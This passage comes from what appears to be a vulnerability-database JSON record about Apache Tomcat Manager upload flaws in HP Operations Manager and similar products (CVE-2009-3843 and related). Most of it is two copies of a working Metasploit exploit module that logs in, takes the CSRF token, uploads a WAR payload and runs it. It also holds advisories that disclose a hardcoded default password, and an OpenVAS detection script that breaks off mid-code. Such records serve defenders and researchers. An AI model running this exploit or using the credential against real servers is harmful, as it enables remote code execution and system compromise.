Manager found running on #{plat} platform and #{arch} architecture\") \n \nreport_auth_info( \n:host => rhost, \n:port => rport, \n:sname => (ssl ? 
\"https\" : \"http\"), \n:user => datastore['USERNAME'], \n:pass => datastore['PASSWORD'], \n:proof => \"WEBAPP=\\\"Tomcat Manager App\\\", VHOST=#{vhost}, PATH=#{datastore['PATH']}\", \n:active => true \n) \n \nreturn CheckCode::Appears \nend \n \ndef exploit \n@app_base = rand_text_alphanumeric(4 + rand(32 - 4)) \n@jsp_name = rand_text_alphanumeric(4 + rand(32 - 4)) \n \n# \n# Find the session ID and the CSRF token \n# \nprint_status(\"#{peer} - Retrieving session ID and CSRF token...\") \nunless access_manager? \nfail_with(Failure::Unknown, \"Unable to access the Tomcat Manager\") \nend \n \n# \n# Upload Payload \n# \nprint_status(\"#{peer} - Uploading and deploying #{@app_base}...\") \nif upload_payload \nreport_auth_info( \n:host => rhost, \n:port => rport, \n:sname => (ssl ? \"https\" : \"http\"), \n:user => datastore['USERNAME'], \n:pass => datastore['PASSWORD'], \n:proof => \"WEBAPP=\\\"Tomcat Manager App\\\", VHOST=#{vhost}, PATH=#{datastore['PATH']}\", \n:active => true \n) \nelse \nfail_with(Failure::Unknown, \"Upload failed\") \nend \n \n# \n# Execute Payload \n# \nprint_status(\"#{peer} - Executing #{@app_base}...\") \nunless execute_payload \nfail_with(Failure::Unknown, \"Failed to execute the payload\") \nend \n \n# \n# Get the new CSRF token & session id \n# \nunless access_manager? 
\nfail_with(Failure::Unknown, \"Unable to access the Tomcat Manager\") \nend \n \n# \n# Delete the deployed payload \n# \nprint_status(\"#{peer} - Undeploying #{@app_base} ...\") \nunless undeploy_app \nprint_warning(\"#{peer} - Failed to undeploy #{@app_base}...\") \nend \nend \n \ndef query_status \npath = normalize_uri(target_uri.path.to_s, 'status') \nres = send_request_raw('uri' => path) \n \nunless res and res.code == 200 \nvprint_error(\"Failed: Error requesting #{path}\") \nreturn nil \nend \n \nreturn res \nend \n \ndef query_manager \npath = normalize_uri(target_uri.path.to_s, '/html') \nres = send_request_raw('uri' => path) \n \nreturn res \nend \n \ndef vars_get \nvars = {} \nunless @csrf_token.nil? \nvars = { \n\"path\" => @app_base, \n\"org.apache.catalina.filters.CSRF_NONCE\" => @csrf_token \n} \nend \n \nreturn vars \nend \n \ndef detect_platform(body) \nreturn nil if body.blank? \n \ni=0 \n \nbody.each_line do |ln| \nln.chomp! \n \ni = 1 if ln =~ /OS Name/ \n \nif i == 9 or i == 11 \nif ln.include? \"Windows\" \nreturn 'win' \nelsif ln.include? \"Linux\" \nreturn 'linux' \nelsif i==11 \nreturn 'unknown' \nend \nend \n \ni = i+1 if i > 0 \nend \nend \n \ndef detect_arch(body) \nreturn nil if body.blank? \n \ni=0 \nbody.each_line do |ln| \nln.chomp! \n \ni = 1 if ln =~ /OS Architecture/ \n \nif i==9 or i==11 \nif ln.include? 'x86' \nreturn ARCH_X86 \nelsif ln.include? 'i386' \nreturn ARCH_X86 \nelsif ln.include? 'i686' \nreturn ARCH_X86 \nelsif ln.include? 'x86_64' \nreturn ARCH_X86 \nelsif ln.include? 'amd64' \nreturn ARCH_X86 \nelsif i==11 \nreturn 'unknown' \nend \nend \n \ni = i + 1 if i > 0 \nend \nend \n \ndef find_csrf(res = nil) \nreturn \"\" if res.blank? \n \nvprint_status(\"#{peer} - Finding CSRF token...\") \n \nbody = res.body \n \nbody.each_line do |ln| \nln.chomp! \ncsrf_nonce = ln.index(CSRF_VAR) \nnext if csrf_nonce.nil? 
\ntoken = ln[csrf_nonce + CSRF_VAR.length, 32] \nreturn token \nend \n \nreturn \"\" \nend \n \ndef generate_multipart_msg(boundary, data) \n# Rex::MIME::Message is breaking the binary upload when trying to \n# enforce CRLF for SMTP compatibility \nwar_multipart = \"-----------------------------\" \nwar_multipart << boundary \nwar_multipart << \"\\r\\nContent-Disposition: form-data; name=\\\"deployWar\\\"; filename=\\\"\" \nwar_multipart << @app_base \nwar_multipart << \".war\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n\" \nwar_multipart << data \nwar_multipart << \"\\r\\n-----------------------------\" \nwar_multipart << boundary \nwar_multipart << \"--\\r\\n\" \nend \n \ndef war_payload \npayload.encoded_war({ \n:app_name => @app_base, \n:jsp_name => @jsp_name, \n:arch => target.arch, \n:platform => target.platform \n}).to_s \nend \n \ndef send_war_payload(url, war) \nboundary_identifier = rand_text_numeric(28) \n \nres = send_request_cgi({ \n'uri' => url, \n'method' => 'POST', \n'ctype' => 'multipart/form-data; boundary=---------------------------' + boundary_identifier, \n'user' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'], \n'cookie' => @session_id, \n'vars_get' => vars_get, \n'data' => generate_multipart_msg(boundary_identifier, war), \n}) \n \nreturn res \nend \n \ndef send_request_undeploy(url) \nres = send_request_cgi({ \n'uri' => url, \n'vars_get' => vars_get, \n'method' => 'POST', \n'user' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'], \n'cookie' => @session_id \n}) \n \nreturn res \nend \n \ndef access_manager? 
\nres = query_manager \nreturn false unless res and res.code == 200 \n@session_id = res.get_cookies \n@csrf_token = find_csrf(res) \nreturn true \nend \n \ndef upload_payload \nwar = war_payload \nupload_path = normalize_uri(target_uri.path.to_s, \"html\", \"upload\") \nvprint_status(\"#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...\") \nres = send_war_payload(upload_path, war) \nreturn parse_upload_response(res) \nend \n \ndef parse_upload_response(res) \nunless res \nvprint_error(\"#{peer} - Upload failed on #{upload_path} [No Response]\") \nreturn false \nend \n \nif res.code < 200 or res.code >= 300 \nvprint_warning(\"Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}\") if res.code == 401 \nvprint_error(\"Upload failed on #{upload_path} [#{res.code} #{res.message}]\") \nreturn false \nend \n \nreturn true \nend \n \ndef execute_payload \njsp_path = normalize_uri(@app_base, \"#{@jsp_name}.jsp\") \n \nvprint_status(\"#{peer} - Executing #{jsp_path}...\") \n \nres = send_request_cgi({ \n'uri' => jsp_path, \n'method' => 'GET' \n}) \n \nreturn parse_execute_response(res) \nend \n \ndef parse_execute_response(res) \nunless res \nvprint_error(\"#{peer} - Execution failed on #{@app_base} [No Response]\") \nreturn false \nend \n \nif res and (res.code < 200 or res.code >= 300) \nvprint_error(\"#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]\") \nreturn false \nend \n \nreturn true \nend \n \ndef undeploy_app \nundeploy_url = normalize_uri(target_uri.path.to_s, \"html\", \"undeploy\") \nres = send_request_undeploy(undeploy_url) \n \nunless res \nvprint_warning(\"#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]\") \nreturn false \nend \n \nif res and (res.code < 200 or res.code >= 300) \nvprint_warning(\"#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]\") \nreturn false \nend \n \nreturn true \nend \n \nend`\n", 
"sourceHref": "https://packetstormsecurity.com/files/download/125021/tomcat_mgr_upload.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:44:46", "description": "BUGTRAQ ID: 37086\r\nCVE ID: CVE-2009-3843\r\n\r\nHP Operations Manager is a consolidated event and performance management console that correlates network and end-user experience events across an IT infrastructure.\r\n\r\nThe Tomcat users XML file shipped with HP Operations Manager contains a hidden account. A malicious user can use this account to access the org.apache.catalina.manager.HTMLManagerServlet class, and this servlet allows a remote user to upload files via a POST request to /manager/html/upload. If an attacker uploads malicious content, it can then be accessed on the server and arbitrary code executed with the privileges of the SYSTEM user.\n\nHP Operations Manager 8.10\nVendor patch:\r\n\r\nHP\r\n--\r\nHP has released a security bulletin (HPSBMA02478) and a corresponding patch for this issue:\r\nHPSBMA02478: SSRT090251 rev.1 - HP Operations Manager for Windows, Remote Unauthorized Access\r\nLink: http://alerts.hp.com/r?2.1.3KT.2ZR.zWmfi.DtgsGC..T.Lt1%5f.2ODk.bW89MQ%5f%5fDNLKFTH0\r\n\r\nPatch download:\r\nhttp://support.openview.hp.com/selfsolve/patches", "cvss3": {}, "published": "2009-11-24T00:00:00", "type": "seebug", "title": "HP Operations Manager 8.10 Backdoor Account Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3843"], "modified": "2009-11-24T00:00:00", "id": "SSV:14974", "href": 
"https://www.seebug.org/vuldb/ssvid-14974", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2023-12-03T19:09:26", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard Operations Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists due to a hidden account present within the Tomcat users XML file. Using this account a malicious user can access the org.apache.catalina.manager.HTMLManagerServlet class. This is defined within the catalina-manager.jar file installed with the product. This servlet allows a remote user to upload a file via a POST request to /manager/html/upload. If an attacker uploads malicious content it can then be accessed and executed on the server which leads to arbitrary code execution under the context of the SYSTEM user.", "cvss3": {}, "published": "2009-11-20T00:00:00", "type": "zdi", "title": "Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2009-11-20T00:00:00", "id": "ZDI-09-085", "href": "https://www.zerodayinitiative.com/advisories/ZDI-09-085/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:39:43", "description": "HP Operations Manager is a consolidated event 
and performance management console that correlates infrastructure, network and end-user experience events across an IT infrastructure. It monitors both physical and virtual servers to identify the root cause of event storms, allowing faster time to resolution at lower cost. It was formerly called OpenView Operations and is built upon the foundation of HP Network Node Manager (NNM). An unauthorized file upload vulnerability exists in HP Operations Manager. The vulnerability is due to insufficient access control within the Apache Tomcat Manager component. A remote attacker can leverage this vulnerability by sending a crafted HTTP request to /manager/html/upload using a set of default credentials. Once authenticated, the attacker can upload a malicious web application to a vulnerable system.", "cvss3": {}, "published": "2009-12-30T00:00:00", "type": "checkpoint_advisories", "title": "HP Operations Manager Server Unauthorized File Upload (CVE-2009-3548; CVE-2009-3843; CVE-2009-4189)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3548", "CVE-2009-3843", "CVE-2009-4189"], "modified": "2016-03-21T00:00:00", "id": "CPAI-2009-312", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-12-04T14:19:20", "description": "HP Operations Manager has a default password of OvW*busr1 for the ovwebusr account, which allows remote attackers to execute arbitrary code via a session that uses the manager role to conduct unrestricted file upload attacks against 
the /manager servlet in the Tomcat servlet container. NOTE: this might overlap CVE-2009-3099 and CVE-2009-3843.", "cvss3": {}, "published": "2009-12-03T17:30:00", "type": "cve", "title": "CVE-2009-4189", "cwe": ["CWE-255"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3099", "CVE-2009-3843", "CVE-2009-4189"], "modified": "2009-12-04T05:00:00", "cpe": ["cpe:/a:hp:operations_manager:*"], "id": "CVE-2009-4189", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:operations_manager:*:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-01-01T20:59:54", "description": "This Metasploit module can be used to execute a payload on Apache Tomcat servers that have an exposed \"manager\" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. 
For example, you must select the Windows target to use native Windows payloads.", "cvss3": {}, "published": "2014-02-04T00:00:00", "type": "zdt", "title": "Apache Tomcat Manager Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-4188", "CVE-2010-4094", "CVE-2009-3843", "CVE-2010-0557", "CVE-2009-4189", "CVE-2009-3548"], "modified": "2014-02-04T00:00:00", "id": "1337DAY-ID-21853", "href": "https://0day.today/exploit/description/21853", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }\r\n\r\n CSRF_VAR = 'CSRF_NONCE='\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution',\r\n 'Description' => %q{\r\n This module can be used to execute a payload on Apache Tomcat servers that\r\n have an exposed \"manager\" application. The payload is uploaded as a WAR archive\r\n containing a jsp application using a POST request against the /manager/html/upload\r\n component.\r\n\r\n NOTE: The compatible payload sets vary based on the selected target. For\r\n example, you must select the Windows target to use native Windows payloads.\r\n },\r\n 'Author' => 'rangercha',\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n # This is based on jduck's tomcat_mgr_deploy.\r\n # the tomcat_mgr_deploy o longer works for current versions of tomcat due to\r\n # CSRF protection tokens. 
Also PUT requests against the /manager/html/deploy\r\n # aren't allowed anymore.\r\n\r\n # There is no single vulnerability associated with deployment functionality.\r\n # Instead, the focus has been on insecure/blank/hardcoded default passwords.\r\n\r\n # The following references refer to HP Operations Manager\r\n ['CVE', '2009-3843'],\r\n ['OSVDB', '60317'],\r\n ['CVE', '2009-4189'],\r\n ['OSVDB', '60670'],\r\n\r\n # HP Operations Dashboard\r\n ['CVE', '2009-4188'],\r\n\r\n # IBM Cognos Express Default user/pass\r\n ['BID', '38084'],\r\n ['CVE', '2010-0557'],\r\n ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'],\r\n\r\n # IBM Rational Quality Manager and Test Lab Manager\r\n ['CVE', '2010-4094'],\r\n ['ZDI', '10-214'],\r\n\r\n # 'admin' password is blank in default Windows installer\r\n ['CVE', '2009-3548'],\r\n ['OSVDB', '60176'],\r\n ['BID', '36954'],\r\n\r\n # tomcat docs\r\n ['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html']\r\n ],\r\n 'Platform' => %w{ java linux win }, # others?\r\n 'Targets' =>\r\n [\r\n [ 'Java Universal',\r\n {\r\n 'Arch' => ARCH_JAVA,\r\n 'Platform' => 'java'\r\n }\r\n ],\r\n #\r\n # Platform specific targets only\r\n #\r\n [ 'Windows Universal',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux x86',\r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Nov 09 2009'))\r\n\r\n register_options(\r\n [\r\n OptString.new('USERNAME', [false, 'The username to authenticate as']),\r\n OptString.new('PASSWORD', [false, 'The password for the specified username']),\r\n # /cognos_express/manager/ for Cognos Express (19300)\r\n OptString.new('TARGETURI', [true, \"The URI path of the manager app (/html/upload and /undeploy will be used)\", '/manager'])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = query_manager\r\n disconnect\r\n\r\n return CheckCode::Unknown if res.nil?\r\n\r\n if 
res.code.between?(400, 499)\r\n vprint_error(\"#{peer} - Server rejected the credentials\")\r\n return CheckCode::Unknown\r\n end\r\n\r\n return CheckCode::Safe unless res.code == 200\r\n\r\n # if res.code == 200\r\n # there should be access to the Tomcat Manager and to the status page\r\n res = query_status\r\n return CheckCode::Unknown unless res\r\n\r\n plat = detect_platform(res.body)\r\n arch = detect_arch(res.body)\r\n return CheckCode::Unknown unless plat and arch\r\n\r\n vprint_status(\"#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture\")\r\n\r\n report_auth_info(\r\n :host => rhost,\r\n :port => rport,\r\n :sname => (ssl ? \"https\" : \"http\"),\r\n :user => datastore['USERNAME'],\r\n :pass => datastore['PASSWORD'],\r\n :proof => \"WEBAPP=\\\"Tomcat Manager App\\\", VHOST=#{vhost}, PATH=#{datastore['PATH']}\",\r\n :active => true\r\n )\r\n\r\n return CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n @app_base = rand_text_alphanumeric(4 + rand(32 - 4))\r\n @jsp_name = rand_text_alphanumeric(4 + rand(32 - 4))\r\n\r\n #\r\n # Find the session ID and the CSRF token\r\n #\r\n print_status(\"#{peer} - Retrieving session ID and CSRF token...\")\r\n unless access_manager?\r\n fail_with(Failure::Unknown, \"Unable to access the Tomcat Manager\")\r\n end\r\n\r\n #\r\n # Upload Payload\r\n #\r\n print_status(\"#{peer} - Uploading and deploying #{@app_base}...\")\r\n if upload_payload\r\n report_auth_info(\r\n :host => rhost,\r\n :port => rport,\r\n :sname => (ssl ? 
\"https\" : \"http\"),\r\n :user => datastore['USERNAME'],\r\n :pass => datastore['PASSWORD'],\r\n :proof => \"WEBAPP=\\\"Tomcat Manager App\\\", VHOST=#{vhost}, PATH=#{datastore['PATH']}\",\r\n :active => true\r\n )\r\n else\r\n fail_with(Failure::Unknown, \"Upload failed\")\r\n end\r\n\r\n #\r\n # Execute Payload\r\n #\r\n print_status(\"#{peer} - Executing #{@app_base}...\")\r\n unless execute_payload\r\n fail_with(Failure::Unknown, \"Failed to execute the payload\")\r\n end\r\n\r\n #\r\n # Get the new CSRF token & session id\r\n #\r\n unless access_manager?\r\n fail_with(Failure::Unknown, \"Unable to access the Tomcat Manager\")\r\n end\r\n\r\n #\r\n # Delete the deployed payload\r\n #\r\n print_status(\"#{peer} - Undeploying #{@app_base} ...\")\r\n unless undeploy_app\r\n print_warning(\"#{peer} - Failed to undeploy #{@app_base}...\")\r\n end\r\n end\r\n\r\n def query_status\r\n path = normalize_uri(target_uri.path.to_s, 'status')\r\n res = send_request_raw('uri' => path)\r\n\r\n unless res and res.code == 200\r\n vprint_error(\"Failed: Error requesting #{path}\")\r\n return nil\r\n end\r\n\r\n return res\r\n end\r\n\r\n def query_manager\r\n path = normalize_uri(target_uri.path.to_s, '/html')\r\n res = send_request_raw('uri' => path)\r\n\r\n return res\r\n end\r\n\r\n def vars_get\r\n vars = {}\r\n unless @csrf_token.nil?\r\n vars = {\r\n \"path\" => @app_base,\r\n \"org.apache.catalina.filters.CSRF_NONCE\" => @csrf_token\r\n }\r\n end\r\n\r\n return vars\r\n end\r\n\r\n def detect_platform(body)\r\n return nil if body.blank?\r\n\r\n i=0\r\n\r\n body.each_line do |ln|\r\n ln.chomp!\r\n\r\n i = 1 if ln =~ /OS Name/\r\n\r\n if i == 9 or i == 11\r\n if ln.include? \"Windows\"\r\n return 'win'\r\n elsif ln.include? 
\"Linux\"\r\n return 'linux'\r\n elsif i==11\r\n return 'unknown'\r\n end\r\n end\r\n\r\n i = i+1 if i > 0\r\n end\r\n end\r\n\r\n def detect_arch(body)\r\n return nil if body.blank?\r\n\r\n i=0\r\n body.each_line do |ln|\r\n ln.chomp!\r\n\r\n i = 1 if ln =~ /OS Architecture/\r\n\r\n if i==9 or i==11\r\n if ln.include? 'x86'\r\n return ARCH_X86\r\n elsif ln.include? 'i386'\r\n return ARCH_X86\r\n elsif ln.include? 'i686'\r\n return ARCH_X86\r\n elsif ln.include? 'x86_64'\r\n return ARCH_X86\r\n elsif ln.include? 'amd64'\r\n return ARCH_X86\r\n elsif i==11\r\n return 'unknown'\r\n end\r\n end\r\n\r\n i = i + 1 if i > 0\r\n end\r\n end\r\n\r\n def find_csrf(res = nil)\r\n return \"\" if res.blank?\r\n\r\n vprint_status(\"#{peer} - Finding CSRF token...\")\r\n\r\n body = res.body\r\n\r\n body.each_line do |ln|\r\n ln.chomp!\r\n csrf_nonce = ln.index(CSRF_VAR)\r\n next if csrf_nonce.nil?\r\n token = ln[csrf_nonce + CSRF_VAR.length, 32]\r\n return token\r\n end\r\n\r\n return \"\"\r\n end\r\n\r\n def generate_multipart_msg(boundary, data)\r\n # Rex::MIME::Message is breaking the binary upload when trying to\r\n # enforce CRLF for SMTP compatibility\r\n war_multipart = \"-----------------------------\"\r\n war_multipart << boundary\r\n war_multipart << \"\\r\\nContent-Disposition: form-data; name=\\\"deployWar\\\"; filename=\\\"\"\r\n war_multipart << @app_base\r\n war_multipart << \".war\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n\"\r\n war_multipart << data\r\n war_multipart << \"\\r\\n-----------------------------\"\r\n war_multipart << boundary\r\n war_multipart << \"--\\r\\n\"\r\n end\r\n\r\n def war_payload\r\n payload.encoded_war({\r\n :app_name => @app_base,\r\n :jsp_name => @jsp_name,\r\n :arch => target.arch,\r\n :platform => target.platform\r\n }).to_s\r\n end\r\n\r\n def send_war_payload(url, war)\r\n boundary_identifier = rand_text_numeric(28)\r\n\r\n res = send_request_cgi({\r\n 'uri' => url,\r\n 'method' => 'POST',\r\n 'ctype' => 
'multipart/form-data; boundary=---------------------------' + boundary_identifier,\r\n 'user' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD'],\r\n 'cookie' => @session_id,\r\n 'vars_get' => vars_get,\r\n 'data' => generate_multipart_msg(boundary_identifier, war),\r\n })\r\n\r\n return res\r\n end\r\n\r\n def send_request_undeploy(url)\r\n res = send_request_cgi({\r\n 'uri' => url,\r\n 'vars_get' => vars_get,\r\n 'method' => 'POST',\r\n 'user' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD'],\r\n 'cookie' => @session_id\r\n })\r\n\r\n return res\r\n end\r\n\r\n def access_manager?\r\n res = query_manager\r\n return false unless res and res.code == 200\r\n @session_id = res.get_cookies\r\n @csrf_token = find_csrf(res)\r\n return true\r\n end\r\n\r\n def upload_payload\r\n war = war_payload\r\n upload_path = normalize_uri(target_uri.path.to_s, \"html\", \"upload\")\r\n vprint_status(\"#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...\")\r\n res = send_war_payload(upload_path, war)\r\n return parse_upload_response(res)\r\n end\r\n\r\n def parse_upload_response(res)\r\n unless res\r\n vprint_error(\"#{peer} - Upload failed on #{upload_path} [No Response]\")\r\n return false\r\n end\r\n\r\n if res.code < 200 or res.code >= 300\r\n vprint_warning(\"Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}\") if res.code == 401\r\n vprint_error(\"Upload failed on #{upload_path} [#{res.code} #{res.message}]\")\r\n return false\r\n end\r\n\r\n return true\r\n end\r\n\r\n def execute_payload\r\n jsp_path = normalize_uri(@app_base, \"#{@jsp_name}.jsp\")\r\n\r\n vprint_status(\"#{peer} - Executing #{jsp_path}...\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => jsp_path,\r\n 'method' => 'GET'\r\n })\r\n\r\n return parse_execute_response(res)\r\n end\r\n\r\n def parse_execute_response(res)\r\n unless res\r\n vprint_error(\"#{peer} - Execution failed on #{@app_base} [No 
Response]\")\r\n return false\r\n end\r\n\r\n if res and (res.code < 200 or res.code >= 300)\r\n vprint_error(\"#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]\")\r\n return false\r\n end\r\n\r\n return true\r\n end\r\n\r\n def undeploy_app\r\n undeploy_url = normalize_uri(target_uri.path.to_s, \"html\", \"undeploy\")\r\n res = send_request_undeploy(undeploy_url)\r\n\r\n unless res\r\n vprint_warning(\"#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]\")\r\n return false\r\n end\r\n\r\n if res and (res.code < 200 or res.code >= 300)\r\n vprint_warning(\"#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]\")\r\n return false\r\n end\r\n\r\n return true\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/21853", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-05-12T17:29:36", "description": "The Apache Tomcat Manager/Host Manager/Server Status is using default or known\n hardcoded credentials.", "cvss3": {}, "published": "2012-08-22T00:00:00", "type": "openvas", "title": "Apache Tomcat Manager/Host Manager/Server Status Default/Hardcoded Credentials", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-4188", "CVE-2010-4094", "CVE-2009-3843", "CVE-2009-3099", "CVE-2010-0557", "CVE-2009-4189", "CVE-2009-3548"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310103550", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103550", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tomcat Manager Remote Unauthorized Access Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the 
GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103550\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2010-4094\", \"CVE-2009-3548\", \"CVE-2009-4189\", \"CVE-2009-3099\", \"CVE-2009-3843\",\n \"CVE-2009-4188\", \"CVE-2010-0557\");\n script_bugtraq_id(44172, 36954, 79264, 79351, 37086, 36258, 38084);\n script_name(\"Apache Tomcat Manager/Host Manager/Server Status Default/Hardcoded Credentials\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-08-22 17:19:15 +0200 (Wed, 22 Aug 2012)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_ATTACK);\n script_family(\"Default Accounts\");\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/www\", 8080);\n script_mandatory_keys(\"apache/tomcat/http/detected\", \"ApacheTomcat/auth_required\");\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_xref(name:\"URL\", 
value:\"https://www.zerodayinitiative.com/advisories/ZDI-10-214/\");\n script_xref(name:\"URL\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-09-085/\");\n\n script_tag(name:\"solution\", value:\"Change the password to a strong one or remove the user from tomcat-users.xml.\");\n\n script_tag(name:\"summary\", value:\"The Apache Tomcat Manager/Host Manager/Server Status is using default or known\n hardcoded credentials.\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to upload and execute arbitrary\n code, which will facilitate a complete compromise of the affected computer.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_timeout(600);\n\n exit(0);\n}\n\nif( get_kb_item( \"default_credentials/disable_default_account_checks\" ) )\n exit( 0 );\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service:\"www\" ) )\n exit( 0 );\n\nif( ! 
